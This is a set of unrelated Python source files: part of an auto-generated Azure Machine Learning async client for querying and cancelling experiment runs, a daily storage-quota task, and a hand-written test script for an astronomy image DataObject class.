~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.get_by_query_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_by_query_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs:query'} # type: ignore
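    # Editorial usage sketch (assumptions: `client` is a service client that
    # exposes this operations class as `client.runs`; the placeholder ids are
    # not real). AsyncItemPaged yields the individual run entries, so paging
    # is transparent to the caller:
    #
    #     async for run in client.runs.get_by_query_by_experiment_name(
    #         subscription_id="<subscription-id>",
    #         resource_group_name="<resource-group>",
    #         workspace_name="<workspace>",
    #         experiment_name="<experiment>",
    #     ):
    #         print(run)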
@distributed_trace
def get_by_query_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.QueryParams"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_by_query_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.QueryParams
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.get_by_query_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_by_query_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs:query'} # type: ignore
@distributed_trace_async
async def get_by_ids_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.GetRunsByIds"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""get_by_ids_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.GetRunsByIds
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunsByIds')
else:
_json = None
request = build_get_by_ids_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.get_by_ids_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_ids_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/runIds'} # type: ignore
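    # Editorial usage sketch for the awaitable variant (same `client`
    # assumption as the sketch above; the `run_ids` field name on
    # GetRunsByIds is an assumption based on the operation's purpose):
    #
    #     result = await client.runs.get_by_ids_by_experiment_id(
    #         subscription_id="<subscription-id>",
    #         resource_group_name="<resource-group>",
    #         workspace_name="<workspace>",
    #         experiment_id="<experiment-id>",
    #         body=_models.GetRunsByIds(run_ids=["<run-id>"]),
    #     )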
@distributed_trace_async
async def get_by_ids_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.GetRunsByIds"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""get_by_ids_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.GetRunsByIds
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunsByIds')
else:
_json = None
request = build_get_by_ids_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.get_by_ids_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_ids_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/runIds'} # type: ignore
@distributed_trace_async
async def cancel_run_with_uri_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
cancelation_reason: Optional[str] = None,
**kwargs: Any
) -> "_models.Run":
"""cancel_run_with_uri_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param cancelation_reason:
:type cancelation_reason: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_cancel_run_with_uri_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
cancelation_reason=cancelation_reason,
template_url=self.cancel_run_with_uri_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel_run_with_uri_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/cancel'} # type: ignore
@distributed_trace_async
async def cancel_run_with_uri_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
cancelation_reason: Optional[str] = None,
**kwargs: Any
) -> "_models.Run":
"""cancel_run_with_uri_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param cancelation_reason:
:type cancelation_reason: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_cancel_run_with_uri_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
cancelation_reason=cancelation_reason,
template_url=self.cancel_run_with_uri_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel_run_with_uri_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/cancel'} # type: ignore
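    # Editorial sketch of a cancel call (same `client` assumption as the
    # sketches above; `cancelation_reason` is an optional free-form string):
    #
    #     run = await client.runs.cancel_run_with_uri_by_experiment_name(
    #         subscription_id="<subscription-id>",
    #         resource_group_name="<resource-group>",
    #         workspace_name="<workspace>",
    #         run_id="<run-id>",
    #         experiment_name="<experiment>",
    #         cancelation_reason="superseded by a newer run",
    #     )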
[record: ploy_app/tasks.py, repo estackhub/ploy_app, lang Python, license MIT]
from ploy_app.ploy_app.allot import validate_files_space_limit, validate_db_space_limit
def daily():
    """Run the daily storage-quota validations."""
    validate_files_space_limit()
    validate_db_space_limit()
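# Editorial sketch: how this task might be wired into a scheduler. The Celery
# decorator and beat entry below are illustrative assumptions, not part of the
# original module:
#
#     from celery import shared_task
#
#     @shared_task
#     def daily_task():
#         daily()
#
#     # then schedule daily_task() once every 24 h via celery beat or cron.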
[record: DataObjectTest.py, repo renshj/High-Cadence-Processing, lang Python, license MIT]
#This file was created by Tate Hagan
from EmptyFileException import EmptyFileException #imports the Errors that can be thrown by the Data Object
from IncorrectTypeException import IncorrectTypeException
from NoSliceException import NoSliceException
from InvalidSizeException import InvalidSizeException
from InvalidCoordException import InvalidCoordException
from InvalidZoomFactorException import InvalidZoomFactorException
from InvalidFlagException import InvalidFlagException
from DataObject import DataObject #imports the Data Object to be tested
from Slice import Slice #for testing slice methods
from ZoomObject import ZoomObject #Used for Zoomed
import numpy as np #For ImageData16
from astropy.io import fits #For fits file reading
from astropy import wcs #Used for WCS
import matplotlib.pyplot as plt
#Filepaths are hardcoded, may need to be altered on other systems with different data
pathinit = "D:/Capstone Project/Sprint-2/"
pathlegit = pathinit + "TestData/" #The TestData directory provided by the client
validtle = pathlegit + "3le-2019-12-19-08-40-18.txt"
validfit = pathlegit + "0097-fast-slew-5-sec.fit"
validfits = pathlegit + "97-wcs.fits"
pathnonlegit = pathinit + "Non-Formatted Files/"
emptytext = pathnonlegit + "ex1.txt" #An empty text file
blahtext = pathnonlegit + "ex2.txt" #A text file that just has the word 'blah'
validsnr = 10.0
print("Checking test paths:\nValid TLE:{}\nValid Image:{}\nValid WCS:{}\nEmpty Text:{}".format(validtle, validfit, validfits, emptytext))
tests = 0
successes = 0
failures = 0
print("Testing Data Object constructor")
print("Test constructor when no filename passed in")
try:
tests = tests + 1
data = DataObject("", 'Photoplot', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws error:")
print(e)
failures = failures + 1
print("Test constructor with non-formatted fit")
try:
tests = tests + 1
data = DataObject(emptytext, 'Photoplot', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'NotAValidFlag', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with non-float SNR")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', "Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
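# Editorial sketch: the expected-exception tests in this script all repeat the
# same try/except bookkeeping. A hypothetical helper like the one below could
# collapse each of them to a single call; it is illustrative only and is not
# invoked by the original tests.
def expect_error(label, expected_exc, fn, *args, **kwargs):
    global tests, successes, failures
    tests = tests + 1
    print(label)
    try:
        fn(*args, **kwargs)
        print("FAILURE-Doesn't throw error")
        failures = failures + 1
    except expected_exc:
        print("SUCCESS-Throws correct error")
        successes = successes + 1
    except Exception as e:
        print("FAILURE-Throws a different error:")
        print(e)
        failures = failures + 1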
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getImageData")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
imgOut = data.getImageData()
with fits.open(validfit) as imghdul: #using the with keyword means that the file will be closed even if an exception is thrown
imgExp = imghdul[0].data
comparison = (imgExp == imgOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgExp, imgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
#We do not space out text for functions with only one test
print("Test getImageData16")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
img16Out = data.getImageData16()
with fits.open(validfit) as imghdul:
img = imghdul[0].data
img16Exp = img.astype(np.int16)
comparison16 = (img16Exp == img16Out)
if(comparison16.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(img16Exp, img16Out))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getImageHeader")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
imgHeaderOut = data.getImageHeader()
with fits.open(validfit) as imghdul:
imgHeaderExp = imghdul[0].header
if(imgHeaderExp == imgHeaderOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgHeaderExp, imgHeaderOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getFlag")
try:
tests = tests + 1
flagExp = 'Publication'
data = DataObject(validfit, flagExp, validsnr)
flagOut = data.getFlag()
if(flagExp == flagOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(flagExp, flagOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getSNR")
try:
tests = tests + 1
snrExp = 5.0
data = DataObject(validfit, 'Publication', snrExp)
snrOut = data.getSNR()
if(snrExp == snrOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(snrExp, snrOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCandGt")
print("Test setCandGt with valid input")
try:
tests = tests + 1
correctField0 = np.array([1,2,3]).astype(np.int64)
correctField1 = np.array([4,5,6]).astype(np.int64)
correctField = (correctField0, correctField1)
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(correctField)
print("SUCCESS-No crash")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCandGt with non-tuple")
try:
tests = tests + 1
nontuple = 7
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(nontuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with wrong number of tuple elements")
try:
tests = tests + 1
element0 = np.array([1,2]).astype(np.int64)
element1 = np.array([2,3]).astype(np.int64)
element2 = np.array([3,4]).astype(np.int64)
wrongElementTuple = (element0, element1, element2)
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(wrongElementTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with non-array elements")
try:
tests = tests + 1
wrongElementTypeTuple = (1,2)
data = DataObject(validfit, 'Orbits', validsnr)
data.setCandGt(wrongElementTypeTuple)
print("FAILURE-Doesn't throw error")
    failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with array elements of incorrect type")
try:
tests = tests + 1
wrongType0 = np.array([1,2,3]) #No cast to int64
wrongType1 = np.array([4,5,6])
wrongtypetuple = (wrongType0, wrongType1)
data = DataObject(validfit, 'Simulate', validsnr)
data.setCandGt(wrongtypetuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with unequal array lengths")
try:
tests = tests + 1
arr0 = np.array([1,2,3]).astype(np.int64)
arr1 = np.array([4]).astype(np.int64)
unequalArraysTuple = (arr0, arr1)
data = DataObject(validfit, 'Simulate', validsnr)
data.setCandGt(unequalArraysTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCandGt")
try:
tests = tests + 1
candGtExp0 = np.array([1,2,3]).astype(np.int64)
candGtExp1 = np.array([4,5,6]).astype(np.int64)
candGtExp = (candGtExp0, candGtExp1)
data = DataObject(validfit, 'Publication', validsnr)
data.setCandGt(candGtExp)
candGtOut = data.getCandGt()
if(candGtExp == candGtOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(candGtExp, candGtOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCandLt")
print("Test setCandLt with valid input")
try:
tests = tests + 1
correctField0 = np.array([1,2,3]).astype(np.int64)
correctField1 = np.array([4,5,6]).astype(np.int64)
correctField = (correctField0, correctField1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(correctField)
print("SUCCESS-No crash")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCandLt with non-tuple")
try:
tests = tests + 1
nontuple = 7
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(nontuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with wrong number of tuple elements")
try:
tests = tests + 1
element0 = np.array([1,2]).astype(np.int64)
element1 = np.array([2,3]).astype(np.int64)
element2 = np.array([3,4]).astype(np.int64)
wrongElementTuple = (element0, element1, element2)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongElementTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with non-array elements")
try:
tests = tests + 1
wrongElementTypeTuple = (1,2)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongElementTypeTuple)
print("FAILURE-Doesn't throw error")
    failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with array elements of incorrect type")
try:
tests = tests + 1
wrongType0 = np.array([1,2,3]) #No cast to int64
wrongType1 = np.array([4,5,6])
wrongtypetuple = (wrongType0, wrongType1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongtypetuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with unequal array lengths")
try:
tests = tests + 1
arr0 = np.array([1,2,3]).astype(np.int64)
arr1 = np.array([4]).astype(np.int64)
unequalArraysTuple = (arr0, arr1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(unequalArraysTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCandLt")
try:
tests = tests + 1
candLtExp0 = np.array([1,2,3]).astype(np.int64)
candLtExp1 = np.array([4,5,6]).astype(np.int64)
candLtExp = (candLtExp0, candLtExp1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(candLtExp)
candLtOut = data.getCandLt()
if(candLtExp == candLtOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(candLtExp, candLtOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setImgStd")
print("Test setImgStd with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setImgStd(np.float64(10))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setImgStd with invalid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setImgStd("Not a float64")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getImgStd")
print("Test getImgStd with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
imgStdExp = np.float64(10)
data.setImgStd(imgStdExp)
imgStdOut = data.getImgStd()
if(imgStdExp == imgStdOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgStdExp, imgStdOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setDiffImg")
print("Test setDiffImg with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
arr = np.array([1,2,3])
data.setDiffImg(arr)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setDiffImg with invalid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setDiffImg("Not an ndarray")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getDiffImg")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
diffImgExp = np.array([1,2,3])
data.setDiffImg(diffImgExp)
diffImgOut = data.getDiffImg()
comparison = (diffImgExp == diffImgOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(diffImgExp, diffImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
#Test Photoplot functions
